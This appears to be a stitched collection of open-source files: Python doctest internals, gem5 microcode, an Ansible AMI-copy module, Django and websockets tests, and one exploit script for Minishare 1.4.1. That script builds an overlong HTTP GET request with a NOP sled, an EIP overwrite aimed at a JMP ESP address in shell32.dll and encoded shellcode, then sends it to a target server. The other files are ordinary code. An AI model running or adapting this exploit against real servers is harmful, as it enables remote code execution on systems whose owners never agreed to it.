segments, and may not be an absolute path (i.e., it may not
begin with "/").
If "module_relative" is False, then the given file paths are
interpreted as os-specific paths. These paths may be absolute
or relative (to the current working directory).
package
A Python package or the name of a Python package whose directory
should be used as the base directory for module relative paths.
If "package" is not specified, then the calling module's
directory is used as the base directory for module relative
filenames. It is an error to specify "package" if
"module_relative" is False.
setUp
A set-up function. This is called before running the
tests in each file. The setUp function will be passed a DocTest
object. The setUp function can access the test globals as the
globs attribute of the test passed.
tearDown
A tear-down function. This is called after running the
tests in each file. The tearDown function will be passed a DocTest
object. The tearDown function can access the test globals as the
globs attribute of the test passed.
globs
A dictionary containing initial global variables for the tests.
optionflags
A set of doctest option flags expressed as an integer.
parser
A DocTestParser (or subclass) that should be used to extract
tests from the files.
"""
suite = unittest.TestSuite()
# We do this here so that _normalize_module is called at the right
# level. If it were called in DocFileTest, then this function
# would be the caller and we might guess the package incorrectly.
if kw.get('module_relative', True):
kw['package'] = _normalize_module(kw.get('package'))
for path in paths:
suite.addTest(DocFileTest(path, **kw))
return suite
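# A minimal sketch, assuming two doctest text files shipped alongside the
# calling module (file names are hypothetical):
#
#     import doctest
#
#     def load_tests(loader, tests, ignore):
#         tests.addTests(doctest.DocFileSuite('usage.txt', 'errors.txt'))
#         return tests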
######################################################################
## 9. Debugging Support
######################################################################
def script_from_examples(s):
output = []
for piece in DocTestParser().parse(s):
if isinstance(piece, Example):
# Add the example's source code (strip trailing NL)
output.append(piece.source[:-1])
# Add the expected output:
want = piece.want
if want:
output.append('# Expected:')
output += ['## '+l for l in want.split('\n')[:-1]]
else:
# Add non-example text.
output += [_comment_line(l)
for l in piece.split('\n')[:-1]]
# Trim junk on both ends.
while output and output[-1] == '#':
output.pop()
while output and output[0] == '#':
output.pop(0)
# Combine the output, and return it.
# Add a courtesy newline to prevent exec from choking (see bug #1172785)
return '\n'.join(output) + '\n'
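# Illustrative sketch of the transformation performed by
# script_from_examples(): prose becomes '# ' comments, example source is
# kept as executable code, and expected output becomes '## ' comments:
#
#     text = "Add two numbers:\n>>> 1 + 1\n2\n"
#     print(script_from_examples(text))
#     # prints:
#     #   # Add two numbers:
#     #   1 + 1
#     #   # Expected:
#     #   ## 2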
def testsource(module, name):
"""Extract the test sources from a doctest docstring as a script.
Provide the module (or dotted name of the module) containing the
test to be debugged and the name (within the module) of the object
with the doc string with tests to be debugged.
"""
module = _normalize_module(module)
tests = DocTestFinder().find(module)
test = [t for t in tests if t.name == name]
if not test:
raise ValueError(name, "not found in tests")
test = test[0]
testsrc = script_from_examples(test.docstring)
return testsrc
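# A minimal sketch (module and object names are hypothetical):
#
#     src = testsource('my_module', 'my_module.my_func')
#     print(src)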
def debug_src(src, pm=False, globs=None):
"""Debug a single doctest docstring, in argument `src`'"""
testsrc = script_from_examples(src)
debug_script(testsrc, pm, globs)
def debug_script(src, pm=False, globs=None):
"Debug a test script. `src` is the script, as a string."
import pdb
    # Note that tempfile.NamedTemporaryFile() cannot be used.  As the
# docs say, a file so created cannot be opened by name a second time
# on modern Windows boxes, and execfile() needs to open it.
srcfilename = tempfile.mktemp(".py", "doctestdebug")
f = open(srcfilename, 'w')
f.write(src)
f.close()
try:
if globs:
globs = globs.copy()
else:
globs = {}
if pm:
try:
exec(compile(open(srcfilename).read(), srcfilename, 'exec'), globs, globs)
except:
print(sys.exc_info()[1])
pdb.post_mortem(sys.exc_info()[2])
else:
# Note that %r is vital here. '%s' instead can, e.g., cause
# backslashes to get treated as metacharacters on Windows.
pdb.run("execfile(%r)" % srcfilename, globs, globs)
finally:
os.remove(srcfilename)
def debug(module, name, pm=False):
"""Debug a single doctest docstring.
Provide the module (or dotted name of the module) containing the
test to be debugged and the name (within the module) of the object
with the docstring with tests to be debugged.
"""
module = _normalize_module(module)
testsrc = testsource(module, name)
debug_script(testsrc, pm, module.__dict__)
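# A minimal sketch, assuming `my_module.my_func` carries a doctest you want
# to step through under pdb (names are hypothetical; pass pm=True to enter
# post-mortem debugging if the examples raise):
#
#     debug('my_module', 'my_module.my_func')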
__test__ = {}
|
apache-2.0
|
zhaishaomin/LDS-prefetcher-research
|
gem5_src/arch/x86/isa/insts/simd128/integer/data_reordering/extract_and_insert.py
|
91
|
2838
|
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop PEXTRW_R_XMM_I {
mov2int reg, xmmlm, "IMMEDIATE & mask(3)", size=2, ext=1
mov2int reg, xmmhm, "IMMEDIATE & mask(3)", size=2, ext=1
};
def macroop PINSRW_XMM_R_I {
mov2fp xmml, regm, "IMMEDIATE & mask(3)", size=2, ext=1
mov2fp xmmh, regm, "IMMEDIATE & mask(3)", size=2, ext=1
};
def macroop PINSRW_XMM_M_I {
ld t1, seg, sib, disp, dataSize=2
mov2fp xmml, t1, "IMMEDIATE & mask(3)", size=2, ext=1
mov2fp xmmh, t1, "IMMEDIATE & mask(3)", size=2, ext=1
};
def macroop PINSRW_XMM_P_I {
rdip t7
ld t1, seg, riprel, disp, dataSize=2
mov2fp xmml, t1, "IMMEDIATE & mask(3)", size=2, ext=1
mov2fp xmmh, t1, "IMMEDIATE & mask(3)", size=2, ext=1
};
'''
|
apache-2.0
|
GheRivero/ansible
|
lib/ansible/modules/cloud/amazon/ec2_ami_copy.py
|
12
|
7355
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_ami_copy
short_description: copies AMI between AWS regions, return new image id
description:
- Copies AMI from a source region to a destination region. B(Since version 2.3 this module depends on boto3.)
version_added: "2.0"
options:
source_region:
description:
- The source region the AMI should be copied from.
required: true
source_image_id:
description:
- The ID of the AMI in source region that should be copied.
required: true
name:
description:
- The name of the new AMI to copy. (As of 2.3 the default is 'default', in prior versions it was 'null'.)
default: "default"
description:
description:
- An optional human-readable string describing the contents and purpose of the new AMI.
encrypted:
description:
- Whether or not the destination snapshots of the copied AMI should be encrypted.
version_added: "2.2"
kms_key_id:
description:
- KMS key id used to encrypt image. If not specified, uses default EBS Customer Master Key (CMK) for your account.
version_added: "2.2"
wait:
description:
- Wait for the copied AMI to be in state 'available' before returning.
type: bool
default: 'no'
wait_timeout:
description:
- How long before wait gives up, in seconds. Prior to 2.3 the default was 1200.
- From 2.3-2.5 this option was deprecated in favor of boto3 waiter defaults.
This was reenabled in 2.6 to allow timeouts greater than 10 minutes.
default: 600
tags:
description:
- A hash/dictionary of tags to add to the new copied AMI; '{"key":"value"}' and '{"key":"value","key":"value"}'
tag_equality:
description:
- Whether to use tags if the source AMI already exists in the target region. If this is set, and all tags match
in an existing AMI, the AMI will not be copied again.
default: false
version_added: 2.6
author: "Amir Moulavi <amir.moulavi@gmail.com>, Tim C <defunct@defunct.io>"
extends_documentation_fragment:
- aws
- ec2
requirements:
- boto3
'''
EXAMPLES = '''
# Basic AMI Copy
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
# AMI copy wait until available
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
wait: yes
wait_timeout: 1200 # Default timeout is 600
register: image_id
# Named AMI copy
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
name: My-Awesome-AMI
description: latest patch
# Tagged AMI copy (will not copy the same AMI twice)
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
tags:
Name: My-Super-AMI
Patch: 1.2.3
tag_equality: yes
# Encrypted AMI copy
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
encrypted: yes
# Encrypted AMI copy with specified key
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
encrypted: yes
kms_key_id: arn:aws:kms:us-east-1:XXXXXXXXXXXX:key/746de6ea-50a4-4bcb-8fbc-e3b29f2d367b
'''
RETURN = '''
image_id:
description: AMI ID of the copied AMI
returned: always
type: string
sample: ami-e689729e
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import ec2_argument_spec
from ansible.module_utils.ec2 import camel_dict_to_snake_dict, ansible_dict_to_boto3_tag_list
try:
from botocore.exceptions import ClientError, NoCredentialsError, WaiterError, BotoCoreError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def copy_image(module, ec2):
"""
Copies an AMI
module : AnsibleModule object
ec2: ec2 connection object
"""
image = None
changed = False
tags = module.params.get('tags')
params = {'SourceRegion': module.params.get('source_region'),
'SourceImageId': module.params.get('source_image_id'),
'Name': module.params.get('name'),
'Description': module.params.get('description'),
'Encrypted': module.params.get('encrypted'),
}
if module.params.get('kms_key_id'):
params['KmsKeyId'] = module.params.get('kms_key_id')
try:
if module.params.get('tag_equality'):
filters = [{'Name': 'tag:%s' % k, 'Values': [v]} for (k, v) in module.params.get('tags').items()]
filters.append(dict(Name='state', Values=['available', 'pending']))
images = ec2.describe_images(Filters=filters)
if len(images['Images']) > 0:
image = images['Images'][0]
if not image:
image = ec2.copy_image(**params)
image_id = image['ImageId']
if tags:
ec2.create_tags(Resources=[image_id],
Tags=ansible_dict_to_boto3_tag_list(tags))
changed = True
if module.params.get('wait'):
delay = 15
max_attempts = module.params.get('wait_timeout') // delay
ec2.get_waiter('image_available').wait(
ImageIds=[image_id],
WaiterConfig={'Delay': delay, 'MaxAttempts': max_attempts}
)
module.exit_json(changed=changed, **camel_dict_to_snake_dict(image))
except WaiterError as e:
module.fail_json_aws(e, msg='An error occurred waiting for the image to become available')
except (ClientError, BotoCoreError) as e:
module.fail_json_aws(e, msg="Could not copy AMI")
except Exception as e:
module.fail_json(msg='Unhandled exception. (%s)' % str(e))
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
source_region=dict(required=True),
source_image_id=dict(required=True),
name=dict(default='default'),
description=dict(default=''),
encrypted=dict(type='bool', default=False, required=False),
kms_key_id=dict(type='str', required=False),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=600),
        tags=dict(type='dict'),
        tag_equality=dict(type='bool', default=False)))
module = AnsibleAWSModule(argument_spec=argument_spec)
# TODO: Check botocore version
ec2 = module.client('ec2')
copy_image(module, ec2)
if __name__ == '__main__':
main()
|
gpl-3.0
|
onedal88/Exploits-1
|
Minishare 1.4.1 /exp/exp5.py
|
3
|
1396
|
#!/usr/bin/python
# exp5
import socket
target_address="127.0.0.1"
target_port=80
buffer = "GET "
buffer+= "\x90" * 1787
buffer+= "\x65\x82\xA5\x7C" # EIP Overwrite. Shell32.dll, XP SP2, JMP ESP, 7CA58265.
buffer+= "\x90" * 16
buffer+= ("\xdb\xca\xd9\x74\x24\xf4\x58\xbb\x17\xb3\xcd\x3f\x2b\xc9\xb1"
"\x33\x31\x58\x17\x83\xe8\xfc\x03\x4f\xa0\x2f\xca\x93\x2e\x26"
"\x35\x6b\xaf\x59\xbf\x8e\x9e\x4b\xdb\xdb\xb3\x5b\xaf\x89\x3f"
"\x17\xfd\x39\xcb\x55\x2a\x4e\x7c\xd3\x0c\x61\x7d\xd5\x90\x2d"
"\xbd\x77\x6d\x2f\x92\x57\x4c\xe0\xe7\x96\x89\x1c\x07\xca\x42"
"\x6b\xba\xfb\xe7\x29\x07\xfd\x27\x26\x37\x85\x42\xf8\xcc\x3f"
"\x4c\x28\x7c\x4b\x06\xd0\xf6\x13\xb7\xe1\xdb\x47\x8b\xa8\x50"
"\xb3\x7f\x2b\xb1\x8d\x80\x1a\xfd\x42\xbf\x93\xf0\x9b\x87\x13"
"\xeb\xe9\xf3\x60\x96\xe9\xc7\x1b\x4c\x7f\xda\xbb\x07\x27\x3e"
"\x3a\xcb\xbe\xb5\x30\xa0\xb5\x92\x54\x37\x19\xa9\x60\xbc\x9c"
"\x7e\xe1\x86\xba\x5a\xaa\x5d\xa2\xfb\x16\x33\xdb\x1c\xfe\xec"
"\x79\x56\xec\xf9\xf8\x35\x7a\xff\x89\x43\xc3\xff\x91\x4b\x63"
"\x68\xa3\xc0\xec\xef\x3c\x03\x49\x1f\x77\x0e\xfb\x88\xde\xda"
"\xbe\xd4\xe0\x30\xfc\xe0\x62\xb1\x7c\x17\x7a\xb0\x79\x53\x3c"
"\x28\xf3\xcc\xa9\x4e\xa0\xed\xfb\x2c\x27\x7e\x67\x9d\xc2\x06"
"\x02\xe1")
buffer+= " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
|
gpl-3.0
|
LighthouseHPC/lighthouse
|
src/Dlighthouse/registration/tests/__init__.py
|
59
|
1347
|
from django.test import TestCase
import registration
from registration.tests.backends import *
from registration.tests.forms import *
from registration.tests.models import *
from registration.tests.views import *
class RegistrationVersionInfoTests(TestCase):
"""
Test django-registration's internal version-reporting
infrastructure.
"""
def setUp(self):
self.version = registration.VERSION
def tearDown(self):
registration.VERSION = self.version
def test_get_version(self):
"""
Test the version-info reporting.
"""
versions = [
{'version': (1, 0, 0, 'alpha', 0),
'expected': "1.0 pre-alpha"},
{'version': (1, 0, 1, 'alpha', 1),
'expected': "1.0.1 alpha 1"},
{'version': (1, 1, 0, 'beta', 2),
'expected': "1.1 beta 2"},
{'version': (1, 2, 1, 'rc', 3),
'expected': "1.2.1 rc 3"},
{'version': (1, 3, 0, 'final', 0),
'expected': "1.3"},
{'version': (1, 4, 1, 'beta', 0),
'expected': "1.4.1 beta"},
]
for version_dict in versions:
registration.VERSION = version_dict['version']
self.assertEqual(registration.get_version(), version_dict['expected'])
|
mit
|
MiltosD/CEFELRC
|
lib/python2.7/site-packages/django_jenkins/tasks/run_pyflakes.py
|
3
|
1798
|
# -*- coding: utf-8 -*-
import os
import re
import sys
from pyflakes.scripts import pyflakes
from cStringIO import StringIO
from django_jenkins.functions import relpath
from django_jenkins.tasks import BaseTask, get_apps_locations
class Task(BaseTask):
def __init__(self, test_labels, options):
super(Task, self).__init__(test_labels, options)
self.test_all = options['test_all']
if options.get('pyflakes_file_output', True):
output_dir = options['output_dir']
if not os.path.exists(output_dir):
os.makedirs(output_dir)
self.output = open(os.path.join(output_dir, 'pyflakes.report'), 'w')
else:
self.output = sys.stdout
def teardown_test_environment(self, **kwargs):
locations = get_apps_locations(self.test_labels, self.test_all)
# run pyflakes tool with captured output
old_stdout, pyflakes_output = sys.stdout, StringIO()
sys.stdout = pyflakes_output
try:
for location in locations:
if os.path.isdir(location):
for dirpath, dirnames, filenames in os.walk(relpath(location)):
for filename in filenames:
if filename.endswith('.py'):
pyflakes.checkPath(os.path.join(dirpath, filename))
else:
pyflakes.checkPath(relpath(location))
finally:
sys.stdout = old_stdout
# save report
pyflakes_output.reset()
while True:
line = pyflakes_output.readline()
if not line:
break
message = re.sub(r': ', r': [E] PYFLAKES:', line)
self.output.write(message)
self.output.close()
|
bsd-3-clause
|
Dino0631/RedRain-Bot
|
cogs/lib/websockets/test_client_server.py
|
8
|
17883
|
import asyncio
import logging
import os
import ssl
import unittest
import unittest.mock
from .client import *
from .exceptions import ConnectionClosed, InvalidHandshake
from .http import USER_AGENT, read_response
from .server import *
# Avoid displaying stack traces at the ERROR logging level.
logging.basicConfig(level=logging.CRITICAL)
testcert = os.path.join(os.path.dirname(__file__), 'testcert.pem')
@asyncio.coroutine
def handler(ws, path):
if path == '/attributes':
yield from ws.send(repr((ws.host, ws.port, ws.secure)))
elif path == '/headers':
yield from ws.send(str(ws.request_headers))
yield from ws.send(str(ws.response_headers))
elif path == '/raw_headers':
yield from ws.send(repr(ws.raw_request_headers))
yield from ws.send(repr(ws.raw_response_headers))
elif path == '/subprotocol':
yield from ws.send(repr(ws.subprotocol))
else:
yield from ws.send((yield from ws.recv()))
class ClientServerTests(unittest.TestCase):
secure = False
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.loop.close()
def run_loop_once(self):
# Process callbacks scheduled with call_soon by appending a callback
# to stop the event loop then running it until it hits that callback.
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
def start_server(self, **kwds):
server = serve(handler, 'localhost', 8642, **kwds)
self.server = self.loop.run_until_complete(server)
def start_client(self, path='', **kwds):
client = connect('ws://localhost:8642/' + path, **kwds)
self.client = self.loop.run_until_complete(client)
def stop_client(self):
try:
self.loop.run_until_complete(
asyncio.wait_for(self.client.worker_task, timeout=1))
except asyncio.TimeoutError: # pragma: no cover
self.fail("Client failed to stop")
def stop_server(self):
self.server.close()
try:
self.loop.run_until_complete(
asyncio.wait_for(self.server.wait_closed(), timeout=1))
except asyncio.TimeoutError: # pragma: no cover
self.fail("Server failed to stop")
def test_basic(self):
self.start_server()
self.start_client()
self.loop.run_until_complete(self.client.send("Hello!"))
reply = self.loop.run_until_complete(self.client.recv())
self.assertEqual(reply, "Hello!")
self.stop_client()
self.stop_server()
def test_server_close_while_client_connected(self):
self.start_server()
self.start_client()
self.stop_server()
def test_explicit_event_loop(self):
self.start_server(loop=self.loop)
self.start_client(loop=self.loop)
self.loop.run_until_complete(self.client.send("Hello!"))
reply = self.loop.run_until_complete(self.client.recv())
self.assertEqual(reply, "Hello!")
self.stop_client()
self.stop_server()
def test_protocol_attributes(self):
self.start_server()
self.start_client('attributes')
expected_attrs = ('localhost', 8642, self.secure)
client_attrs = (self.client.host, self.client.port, self.client.secure)
self.assertEqual(client_attrs, expected_attrs)
server_attrs = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_attrs, repr(expected_attrs))
self.stop_client()
self.stop_server()
def test_protocol_headers(self):
self.start_server()
self.start_client('headers')
client_req = self.client.request_headers
client_resp = self.client.response_headers
self.assertEqual(client_req['User-Agent'], USER_AGENT)
self.assertEqual(client_resp['Server'], USER_AGENT)
server_req = self.loop.run_until_complete(self.client.recv())
server_resp = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_req, str(client_req))
self.assertEqual(server_resp, str(client_resp))
self.stop_client()
self.stop_server()
def test_protocol_raw_headers(self):
self.start_server()
self.start_client('raw_headers')
client_req = self.client.raw_request_headers
client_resp = self.client.raw_response_headers
self.assertEqual(dict(client_req)['User-Agent'], USER_AGENT)
self.assertEqual(dict(client_resp)['Server'], USER_AGENT)
server_req = self.loop.run_until_complete(self.client.recv())
server_resp = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_req, repr(client_req))
self.assertEqual(server_resp, repr(client_resp))
self.stop_client()
self.stop_server()
def test_protocol_custom_request_headers_dict(self):
self.start_server()
self.start_client('raw_headers', extra_headers={'X-Spam': 'Eggs'})
req_headers = self.loop.run_until_complete(self.client.recv())
self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", req_headers)
self.stop_client()
self.stop_server()
def test_protocol_custom_request_headers_list(self):
self.start_server()
self.start_client('raw_headers', extra_headers=[('X-Spam', 'Eggs')])
req_headers = self.loop.run_until_complete(self.client.recv())
self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", req_headers)
self.stop_client()
self.stop_server()
def test_protocol_custom_response_headers_callable_dict(self):
self.start_server(extra_headers=lambda p, r: {'X-Spam': 'Eggs'})
self.start_client('raw_headers')
self.loop.run_until_complete(self.client.recv())
resp_headers = self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", resp_headers)
self.stop_client()
self.stop_server()
def test_protocol_custom_response_headers_callable_list(self):
self.start_server(extra_headers=lambda p, r: [('X-Spam', 'Eggs')])
self.start_client('raw_headers')
self.loop.run_until_complete(self.client.recv())
resp_headers = self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", resp_headers)
self.stop_client()
self.stop_server()
def test_protocol_custom_response_headers_dict(self):
self.start_server(extra_headers={'X-Spam': 'Eggs'})
self.start_client('raw_headers')
self.loop.run_until_complete(self.client.recv())
resp_headers = self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", resp_headers)
self.stop_client()
self.stop_server()
def test_protocol_custom_response_headers_list(self):
self.start_server(extra_headers=[('X-Spam', 'Eggs')])
self.start_client('raw_headers')
self.loop.run_until_complete(self.client.recv())
resp_headers = self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", resp_headers)
self.stop_client()
self.stop_server()
def test_no_subprotocol(self):
self.start_server()
self.start_client('subprotocol')
server_subprotocol = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_subprotocol, repr(None))
self.assertEqual(self.client.subprotocol, None)
self.stop_client()
self.stop_server()
def test_subprotocol_found(self):
self.start_server(subprotocols=['superchat', 'chat'])
self.start_client('subprotocol', subprotocols=['otherchat', 'chat'])
server_subprotocol = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_subprotocol, repr('chat'))
self.assertEqual(self.client.subprotocol, 'chat')
self.stop_client()
self.stop_server()
def test_subprotocol_not_found(self):
self.start_server(subprotocols=['superchat'])
self.start_client('subprotocol', subprotocols=['otherchat'])
server_subprotocol = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_subprotocol, repr(None))
self.assertEqual(self.client.subprotocol, None)
self.stop_client()
self.stop_server()
def test_subprotocol_not_offered(self):
self.start_server()
self.start_client('subprotocol', subprotocols=['otherchat', 'chat'])
server_subprotocol = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_subprotocol, repr(None))
self.assertEqual(self.client.subprotocol, None)
self.stop_client()
self.stop_server()
def test_subprotocol_not_requested(self):
self.start_server(subprotocols=['superchat', 'chat'])
self.start_client('subprotocol')
server_subprotocol = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_subprotocol, repr(None))
self.assertEqual(self.client.subprotocol, None)
self.stop_client()
self.stop_server()
@unittest.mock.patch.object(WebSocketServerProtocol, 'select_subprotocol')
def test_subprotocol_error(self, _select_subprotocol):
_select_subprotocol.return_value = 'superchat'
self.start_server(subprotocols=['superchat'])
with self.assertRaises(InvalidHandshake):
self.start_client('subprotocol', subprotocols=['otherchat'])
self.run_loop_once()
self.stop_server()
@unittest.mock.patch('websockets.server.read_request')
def test_server_receives_malformed_request(self, _read_request):
_read_request.side_effect = ValueError("read_request failed")
self.start_server()
with self.assertRaises(InvalidHandshake):
self.start_client()
self.stop_server()
@unittest.mock.patch('websockets.client.read_response')
def test_client_receives_malformed_response(self, _read_response):
_read_response.side_effect = ValueError("read_response failed")
self.start_server()
with self.assertRaises(InvalidHandshake):
self.start_client()
self.run_loop_once()
self.stop_server()
@unittest.mock.patch('websockets.client.build_request')
def test_client_sends_invalid_handshake_request(self, _build_request):
def wrong_build_request(set_header):
return '42'
_build_request.side_effect = wrong_build_request
self.start_server()
with self.assertRaises(InvalidHandshake):
self.start_client()
self.stop_server()
@unittest.mock.patch('websockets.server.build_response')
def test_server_sends_invalid_handshake_response(self, _build_response):
def wrong_build_response(set_header, key):
return build_response(set_header, '42')
_build_response.side_effect = wrong_build_response
self.start_server()
with self.assertRaises(InvalidHandshake):
self.start_client()
self.stop_server()
@unittest.mock.patch('websockets.client.read_response')
def test_server_does_not_switch_protocols(self, _read_response):
@asyncio.coroutine
def wrong_read_response(stream):
code, headers = yield from read_response(stream)
return 400, headers
_read_response.side_effect = wrong_read_response
self.start_server()
with self.assertRaises(InvalidHandshake):
self.start_client()
self.run_loop_once()
self.stop_server()
@unittest.mock.patch('websockets.server.WebSocketServerProtocol.send')
def test_server_handler_crashes(self, send):
send.side_effect = ValueError("send failed")
self.start_server()
self.start_client()
self.loop.run_until_complete(self.client.send("Hello!"))
with self.assertRaises(ConnectionClosed):
self.loop.run_until_complete(self.client.recv())
self.stop_client()
self.stop_server()
# Connection ends with an unexpected error.
self.assertEqual(self.client.close_code, 1011)
@unittest.mock.patch('websockets.server.WebSocketServerProtocol.close')
def test_server_close_crashes(self, close):
close.side_effect = ValueError("close failed")
self.start_server()
self.start_client()
self.loop.run_until_complete(self.client.send("Hello!"))
reply = self.loop.run_until_complete(self.client.recv())
self.assertEqual(reply, "Hello!")
self.stop_client()
self.stop_server()
# Connection ends with an abnormal closure.
self.assertEqual(self.client.close_code, 1006)
@unittest.mock.patch.object(WebSocketClientProtocol, 'handshake')
def test_client_closes_connection_before_handshake(self, handshake):
self.start_server()
self.start_client()
# We have mocked the handshake() method to prevent the client from
# performing the opening handshake. Force it to close the connection.
self.loop.run_until_complete(self.client.close_connection(force=True))
self.stop_client()
# The server should stop properly anyway. It used to hang because the
# worker handling the connection was waiting for the opening handshake.
self.stop_server()
@unittest.mock.patch('websockets.server.read_request')
def test_server_shuts_down_during_opening_handshake(self, _read_request):
_read_request.side_effect = asyncio.CancelledError
self.start_server()
self.server.closing = True
with self.assertRaises(InvalidHandshake) as raised:
self.start_client()
self.stop_server()
# Opening handshake fails with 503 Service Unavailable
self.assertEqual(str(raised.exception), "Bad status code: 503")
def test_server_shuts_down_during_connection_handling(self):
self.start_server()
self.start_client()
self.server.close()
with self.assertRaises(ConnectionClosed):
self.loop.run_until_complete(self.client.recv())
self.stop_client()
self.stop_server()
# Websocket connection terminates with 1001 Going Away.
self.assertEqual(self.client.close_code, 1001)
@unittest.skipUnless(os.path.exists(testcert), "test certificate is missing")
class SSLClientServerTests(ClientServerTests):
secure = True
@property
def server_context(self):
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ssl_context.load_cert_chain(testcert)
return ssl_context
@property
def client_context(self):
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ssl_context.load_verify_locations(testcert)
ssl_context.verify_mode = ssl.CERT_REQUIRED
return ssl_context
def start_server(self, *args, **kwds):
kwds['ssl'] = self.server_context
server = serve(handler, 'localhost', 8642, **kwds)
self.server = self.loop.run_until_complete(server)
def start_client(self, path='', **kwds):
kwds['ssl'] = self.client_context
client = connect('wss://localhost:8642/' + path, **kwds)
self.client = self.loop.run_until_complete(client)
def test_ws_uri_is_rejected(self):
self.start_server()
client = connect('ws://localhost:8642/', ssl=self.client_context)
with self.assertRaises(ValueError):
self.loop.run_until_complete(client)
self.stop_server()
class ClientServerOriginTests(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.loop.close()
def test_checking_origin_succeeds(self):
server = self.loop.run_until_complete(
serve(handler, 'localhost', 8642, origins=['http://localhost']))
client = self.loop.run_until_complete(
connect('ws://localhost:8642/', origin='http://localhost'))
self.loop.run_until_complete(client.send("Hello!"))
self.assertEqual(self.loop.run_until_complete(client.recv()), "Hello!")
self.loop.run_until_complete(client.close())
server.close()
self.loop.run_until_complete(server.wait_closed())
def test_checking_origin_fails(self):
server = self.loop.run_until_complete(
serve(handler, 'localhost', 8642, origins=['http://localhost']))
with self.assertRaisesRegex(InvalidHandshake, "Bad status code: 403"):
self.loop.run_until_complete(
connect('ws://localhost:8642/', origin='http://otherhost'))
server.close()
self.loop.run_until_complete(server.wait_closed())
def test_checking_lack_of_origin_succeeds(self):
server = self.loop.run_until_complete(
serve(handler, 'localhost', 8642, origins=['']))
client = self.loop.run_until_complete(connect('ws://localhost:8642/'))
self.loop.run_until_complete(client.send("Hello!"))
self.assertEqual(self.loop.run_until_complete(client.recv()), "Hello!")
self.loop.run_until_complete(client.close())
server.close()
self.loop.run_until_complete(server.wait_closed())
try:
from .py35.client_server import ClientServerContextManager
except (SyntaxError, ImportError): # pragma: no cover
pass
else:
